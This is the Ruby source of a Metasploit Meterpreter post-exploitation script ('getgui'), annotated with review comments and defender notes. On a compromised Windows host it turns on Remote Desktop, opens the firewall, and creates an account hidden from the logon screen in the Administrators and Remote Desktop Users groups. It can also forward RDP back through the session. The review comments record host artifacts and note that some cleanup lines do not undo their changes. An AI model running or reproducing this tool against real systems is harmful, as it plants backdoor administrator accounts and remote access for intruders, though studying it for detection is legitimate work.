  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. # Author: Carlos Perez at carlos_perez[at]darkoperator.com
  7. #-------------------------------------------------------------------------------
  8. ################## Variable Declarations ##################
# ---- Script setup: session handle, local log directory and cleanup-script path ----
# `client` is the active Meterpreter session handed to the script by the runner.
session = client
# Hostname reported by the target (sysinfo['Computer']); not referenced again in this script.
host_name = client.sys.config.sysinfo['Computer']
# Timestamp suffix appended to generated file names.
# NOTE(review): the format is %Y%m%d.%M%S — minute and second only, there is no %H
# hour field — so runs at the same minute-of-hour on different hours collide.
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
# Local (attacker-side) directory for this script's artifacts under the framework log directory.
logs = ::File.join(Msf::Config.log_directory,'scripts', 'getgui')
# Create the log directory
::FileUtils.mkdir_p(logs)
# Cleanup script file name: a resource (.rc) file into which the functions below
# write, via file_local_write, the commands meant to revert each change they make.
@dest = logs + "/clean_up_" + filenameinfo + ".rc"
# Option table: each entry is [takes_argument, description].
# NOTE(review): a class variable (@@) at script scope; which class it attaches to
# depends on the context the script runner evaluates this file in.
@@exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ],
  "-e" => [ false, "Enable RDP only." ],
  "-p" => [ true, "The Password of the user to add." ],
  "-u" => [ true, "The Username of the user to add." ],
  "-f" => [ true, "Forward RDP Connection." ]
)
  26. def usage
  27. print_line("Windows Remote Desktop Enabler Meterpreter Script")
  28. print_line("Usage: getgui -u <username> -p <password>")
  29. print_line("Or: getgui -e")
  30. print(@@exec_opts.usage)
  31. raise Rex::Script::Completed
  32. end
  33. def enablerd()
  34. key = 'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server'
  35. value = "fDenyTSConnections"
  36. begin
  37. v = registry_getvaldata(key,value)
  38. print_status "Enabling Remote Desktop"
  39. if v == 1
  40. print_status "\tRDP is disabled; enabling it ..."
  41. registry_setvaldata(key,value,0,"REG_DWORD")
  42. file_local_write(@dest,"reg setval -k \'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\' -v 'fDenyTSConnections' -d \"1\"")
  43. else
  44. print_status "\tRDP is already enabled"
  45. end
  46. rescue::Exception => e
  47. print_status("The following Error was encountered: #{e.class} #{e}")
  48. end
  49. end
# Sets the TermService (Terminal Services) service to automatic start, starts it,
# and opens the Remote Desktop exception in the local firewall. Each step appends
# a command to the cleanup script (@dest).
#
# Defender notes (artifacts visible on the host): a change to
# HKLM\SYSTEM\CurrentControlSet\Services\TermService\Start, an `sc start termservice`
# and a `netsh firewall set service type = remotedesktop mode = enable` executed
# through cmd.exe.
#
# NOTE(review): the cleanup lines do not restore the original state — the service
# startup value is reset to `disabled` regardless of what it was before (the check
# is `!= 2`, so a manual/3 start type is also rewritten), and the firewall cleanup
# line repeats `mode = enable`, so the firewall exception is never reverted.
def enabletssrv()
  rdp_key = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TermService"
  begin
    v2 = registry_getvaldata(rdp_key,"Start")
    print_status "Setting Terminal Services service startup mode"
    # 2 == automatic start; anything else is switched to auto.
    if v2 != 2
      print_status "\tThe Terminal Services service is not set to auto, changing it to auto ..."
      service_change_startup("TermService","auto")
      # Cleanup: hard-coded to `disabled`, not to the previous Start value.
      file_local_write(@dest,"execute -H -f cmd.exe -a \"/c sc config termservice start= disabled\"")
      cmd_exec("sc start termservice")
      file_local_write(@dest,"execute -H -f cmd.exe -a \"/c sc stop termservice\"")
    else
      print_status "\tTerminal Services service is already set to auto"
    end
    # Enabling Exception on the Firewall (legacy `netsh firewall` context).
    print_status "\tOpening port in local firewall if necessary"
    cmd_exec('netsh firewall set service type = remotedesktop mode = enable')
    # NOTE(review): this "cleanup" line enables the exception again rather than disabling it.
    file_local_write(@dest,"execute -H -f cmd.exe -a \"/c 'netsh firewall set service type = remotedesktop mode = enable'\"")
  # `rescue::Exception` parses as `rescue ::Exception` — catches everything and only prints it.
  rescue::Exception => e
    print_status("The following Error was encountered: #{e.class} #{e}")
  end
end
# Creates a local user with the given password, hides it from the Windows logon
# screen, and adds it to the Remote Desktop Users (S-1-5-32-555) and
# Administrators (S-1-5-32-544) local groups. Group names are resolved from the
# well-known SIDs so localized names are used. Revert commands (delete the user,
# remove the UserList value) are written to the cleanup script only on success.
#
# @param session  unused inside this method.
# @param username [String] account name, interpolated unquoted into `net user`.
# @param password [String] account password; printed in clear text to the console
#                 by the status line below and passed on the cmd.exe command line.
#
# Defender notes (host artifacts): `net user <name> <pw> /add`, a REG_DWORD value
# named after the account under
# HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList,
# and two `net localgroup ... /add` executions.
def addrdpusr(session, username, password)
  rdu = resolve_sid("S-1-5-32-555")[:name]
  admin = resolve_sid("S-1-5-32-544")[:name]
  print_status "Setting user account for logon"
  print_status "\tAdding User: #{username} with Password: #{password}"
  begin
    addusr_out = cmd_exec("cmd.exe", "/c net user #{username} #{password} /add")
    # NOTE(review): success is detected by the English word "success" in net.exe
    # output; on a non-English system the account may be created but reported as
    # a failure, in which case no cleanup line is written.
    if addusr_out =~ /success/i
      file_local_write(@dest,"execute -H -f cmd.exe -a \"/c net user #{username} /delete\"")
      print_status "\tHiding user from Windows Login screen"
      hide_user_key = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList'
      # A value of 0 under UserList suppresses the account on the logon screen.
      registry_setvaldata(hide_user_key,username,0,"REG_DWORD")
      file_local_write(@dest,"reg deleteval -k HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\ NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList -v #{username}")
      print_status "\tAdding User: #{username} to local group '#{rdu}'"
      # The RDP group name is quoted (it contains spaces); the admin group name
      # below is not — presumably fine for "Administrators", verify for locales
      # where the resolved name contains spaces.
      cmd_exec("cmd.exe","/c net localgroup \"#{rdu}\" #{username} /add")
      print_status "\tAdding User: #{username} to local group '#{admin}'"
      cmd_exec("cmd.exe","/c net localgroup #{admin} #{username} /add")
      print_status "You can now login with the created user"
    else
      print_error("Account could not be created")
      print_error("Error:")
      addusr_out.each_line do |l|
        print_error("\t#{l.chomp}")
      end
    end
  # `rescue::Exception` parses as `rescue ::Exception` — catches everything and only prints it.
  rescue::Exception => e
    print_status("The following Error was encountered: #{e.class} #{e}")
  end
end
  101. def message
  102. print_status "Windows Remote Desktop Configuration Meterpreter Script by Darkoperator"
  103. print_status "Carlos Perez carlos_perez@darkoperator.com"
  104. end
  105. ################## MAIN ##################
  106. # Parsing of Options
# Option state. `lang` is declared but never used.
usr = nil
pass = nil
lang = nil
# Default local port for the optional port forward: a random port in 1024..2047.
# When -f is given, `lport` is replaced by the option's raw string value.
lport = 1024 + rand(1024)
enbl = nil
frwrd = nil
@@exec_opts.parse(args) { |opt, idx, val|
  case opt
  when "-u"
    usr = val
  when "-p"
    pass = val
  when "-h"
    # usage raises Rex::Script::Completed, so parsing stops here.
    usage
  when "-f"
    frwrd = true
    lport = val
  when "-e"
    enbl = true
  end
}
if client.platform == 'windows'
  if args.length > 0
    # Either -e alone, or both -u and -p, is a valid invocation.
    # NOTE(review): `or`/`and` have lower precedence than `=`/`||`; they work here
    # only because the result is consumed directly by `if`.
    if enbl or (usr and pass)
      message
      if enbl
        # Both helpers modify HKLM and system services, hence the privilege check.
        if is_admin?
          enablerd()
          enabletssrv()
        else
          print_error("Insufficient privileges, Remote Desktop Service was not modified.")
        end
      end
      if usr and pass
        if is_admin?
          addrdpusr(session, usr, pass)
        else
          # NOTE(review): the message text reads "was not be created" (runtime string, left as-is).
          print_error("Insufficient privileges, account was not be created.")
        end
      end
      if frwrd == true
        # Local listener on the Metasploit host, bound to all interfaces (0.0.0.0),
        # forwarding to the target's RDP port via the session.
        print_status("Starting the port forwarding at local port #{lport}")
        client.run_cmd("portfwd add -L 0.0.0.0 -l #{lport} -p 3389 -r 127.0.0.1")
      end
      print_status("For cleanup use command: run multi_console_command -r #{@dest}")
    else
      usage
    end
  else
    usage
  end
else
  print_error("This version of Meterpreter is not supported with this Script!")
  raise Rex::Script::Completed
end